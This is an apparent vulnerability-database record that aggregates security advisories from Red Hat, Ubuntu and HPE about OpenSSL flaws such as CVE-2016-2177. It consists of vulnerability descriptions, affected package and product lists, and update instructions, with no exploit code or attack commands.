"http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3505" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507" } ], "sources": [ { "db": "BID", "id": "69077" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "131254" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "NVD", "id": "CVE-2014-5139" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "BID", "id": "69077" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "131254" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "NVD", "id": "CVE-2014-5139" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-06T00:00:00", "db": "BID", "id": "69077" }, { "date": "2015-03-18T00:44:34", "db": "PACKETSTORM", "id": "130868" }, { "date": "2015-03-25T00:41:42", "db": "PACKETSTORM", "id": "131011" }, { "date": "2015-03-25T00:42:25", "db": "PACKETSTORM", "id": "131014" }, { "date": "2015-03-13T17:11:14", "db": "PACKETSTORM", "id": "130817" }, { "date": "2015-05-29T23:37:11", "db": "PACKETSTORM", "id": "132081" }, { "date": "2015-05-29T23:37:04", "db": "PACKETSTORM", "id": "132080" }, { "date": "2015-04-02T00:37:56", "db": "PACKETSTORM", "id": "131254" }, { "date": "2014-08-11T11:11:00", "db": "PACKETSTORM", "id": "127811" }, { "date": "2014-08-06T12:12:12", "db": "PACKETSTORM", "id": "169648" }, { "date": "2014-08-13T23:55:07.717000", "db": "NVD", "id": "CVE-2014-5139" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-07-26T23:01:00", "db": "BID", "id": "69077" }, { "date": "2023-11-07T02:20:43.020000", "db": "NVD", "id": "CVE-2014-5139" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "69077" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL NULL Pointer Dereference CVE-2014-5139 Local Denial of Service Vulnerability", "sources": [ { "db": "BID", "id": "69077" } ], "trust": 0.3 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "69077" } ], "trust": 0.3 } }
var-201606-0478
Vulnerability from variot
OpenSSL through 1.0.2h incorrectly uses pointer arithmetic for heap-buffer boundary checks, which might allow remote attackers to cause a denial of service (integer overflow and application crash) or possibly have unspecified other impact by leveraging unexpected malloc behavior, related to s3_srvr.c, ssl_sess.c, and t1_lib.c. Supplementary information : CWE Vulnerability type by CWE-190: Integer Overflow or Wraparound ( Integer overflow or wraparound ) Has been identified. OpenSSL is prone to an integer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. OpenSSL 1.0.2h and prior versions are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 7 Advisory ID: RHSA-2017:0194-01 Product: Red Hat JBoss Core Services Advisory URL: https://access.redhat.com/errata/RHSA-2017:0194 Issue date: 2017-01-25 CVE Names: CVE-2016-2108 CVE-2016-2177 CVE-2016-2178 CVE-2016-4459 CVE-2016-6808 CVE-2016-8612 =====================================================================
- Summary:
An update is now available for JBoss Core Services on RHEL 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss Core Services on RHEL 7 Server - noarch, ppc64, x86_64
- Description:
This release adds the new Apache HTTP Server 2.4.23 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Pack Apache Server 2.4.6 and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes and enhancements included in this release. (CVE-2016-2108)
-
It was found that the length checks prior to writing to the target buffer for creating a virtual host mapping rule did not take account of the length of the virtual host name, creating the potential for a buffer overflow. (CVE-2016-2178)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
It was discovered that specifying configuration with a JVMRoute path longer than 80 characters will cause segmentation fault leading to a server crash. (CVE-2016-4459)
-
An error was found in protocol parsing logic of mod_cluster load balancer Apache HTTP Server modules. An attacker could use this flaw to cause a Segmentation Fault in the serving httpd process. (CVE-2016-8612)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108. The CVE-2016-4459 issue was discovered by Robert Bost (Red Hat). Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Bock, and David Benjamin (Google) as the original reporters of CVE-2016-2108.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted. After installing the updated packages, the httpd daemon will be restarted automatically.
- Package List:
Red Hat JBoss Core Services on RHEL 7 Server:
Source: jbcs-httpd24-httpd-2.4.23-102.jbcs.el7.src.rpm jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el7.src.rpm jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el7.src.rpm jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el7.src.rpm jbcs-httpd24-mod_jk-1.2.41-14.redhat_1.jbcs.el7.src.rpm jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el7.src.rpm jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el7.src.rpm jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el7.src.rpm jbcs-httpd24-openssl-1.0.2h-12.jbcs.el7.src.rpm
noarch: jbcs-httpd24-httpd-manual-2.4.23-102.jbcs.el7.noarch.rpm
ppc64: jbcs-httpd24-httpd-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_session-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el7.ppc64.rpm jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el7.ppc64.rpm jbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-1.0.2h-12.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el7.ppc64.rpm
x86_64: jbcs-httpd24-httpd-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_session-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el7.x86_64.rpm jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el7.x86_64.rpm jbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-1.0.2h-12.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-4459 https://access.redhat.com/security/cve/CVE-2016-6808 https://access.redhat.com/security/cve/CVE-2016-8612 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFYiQWBXlSAg2UNWIIRArWdAJwO4BE3aBxonVdBzdTUsNa+5ZKLmwCfSRUf 2AmaztKx6GqFZTJkumoOcS8= =0wxz -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. For further information, see the knowledge base article linked to in the References section. The JBoss server process must be restarted for the update to take effect. Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL.
Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
USN-3087-1 fixed vulnerabilities in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2179) Shi Lei discovered that OpenSSL incorrectly handled memory in the TS_OBJ_print_bio() function. (CVE-2016-2180) It was discovered that the OpenSSL incorrectly handled the DTLS anti-replay feature. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. This update moves DES from the HIGH cipher list to MEDIUM. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6302) Shi Lei discovered that OpenSSL incorrectly handled memory in the MDC2_Update() function. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03763en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03763en_us Version: 1
HPESBHF03763 rev.1 - HPE Comware 7, IMC, VCX products using OpenSSL, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-08-01 Last Updated: 2017-08-01
Potential Security Impact: Remote: Denial of Service (DoS)
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified in Comware 7, IMC, VCX products using OpenSSL.
- Comware v7 (CW7) Products See resolution section for impacted versions
- HP Intelligent Management Center (iMC) See resolution section for impacted versions
- VCX Products 9.8.19
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-2177
7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has provided the following software updates to resolve the vulnerability in Comware 7, IMC PLAT, and VCX.
Note: The following products are impacted by this issue
COMWARE 7 Products
-
12500 (Comware 7) - Version: R7377P02
- HPE Branded Products Impacted
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
-
10500 (Comware 7) - Version: R7184
- HPE Branded Products Impacted
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
-
5900/5920 (Comware 7) - Version: R2432
- HPE Branded Products Impacted
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
-
MSR1000 (Comware 7) - Version: R0306P80
- HPE Branded Products Impacted
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
-
MSR2000 (Comware 7) - Version: R0306P80
- HPE Branded Products Impacted
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
-
MSR3000 (Comware 7) - Version: R0306P80
- HPE Branded Products Impacted
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
-
MSR4000 (Comware 7) - Version: R0306P80
- HPE Branded Products Impacted
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
-
VSR (Comware 7) - Version: E0324
- HPE Branded Products Impacted
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
-
7900 (Comware 7) - Version: R2152
- HPE Branded Products Impacted
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
-
5130EI (Comware 7) - Version: R3115P05
- HPE Branded Products Impacted
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
-
6125XLG - Version: R2432
- HPE Branded Products Impacted
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
-
6127XLG - Version: R2432
- HPE Branded Products Impacted
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
-
Moonshot - Version: R2432
- HPE Branded Products Impacted
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
-
5700 (Comware 7) - Version: R2432
- HPE Branded Products Impacted
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
-
5930 (Comware 7) - Version: R2432
- HPE Branded Products Impacted
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
-
1950 (Comware 7) - Version: R3115P06
- HPE Branded Products Impacted
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
-
7500 (Comware 7) - Version: R7184
- HPE Branded Products Impacted
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
-
5510HI (Comware 7) - Version: R1121P01
- HPE Branded Products Impacted
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
-
5130HI (Comware 7) - Version: R1121P02
- HPE Branded Products Impacted
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
-
5940 (Comware 7) - Version: R2509P02
- HPE Branded Products Impacted
- JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch
- JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch
- JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch
- JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch
- JH396A HPE FlexFabric 5940 32QSFP+ Switch
- JH397A HPE FlexFabric 5940 2-slot Switch
- JH398A HPE FlexFabric 5940 4-slot Switch
-
5950 (Comware 7) - Version: R6123
- HPE Branded Products Impacted
- JH321A HPE FlexFabric 5950 32QSFP28 Switch
- JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch
- JH404A HPE FlexFabric 5950 4-slot Switch
-
12900E (Comware 7) - Version: R2609
- HPE Branded Products Impacted
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
-
iNode PC 7.2 (E0410) - Version: 7.2 E0410
- HPE Branded Products Impacted
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
-
iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409
- HPE Branded Products Impacted
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
-
VCX - Version: 9.8.19
- HPE Branded Products Impacted
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
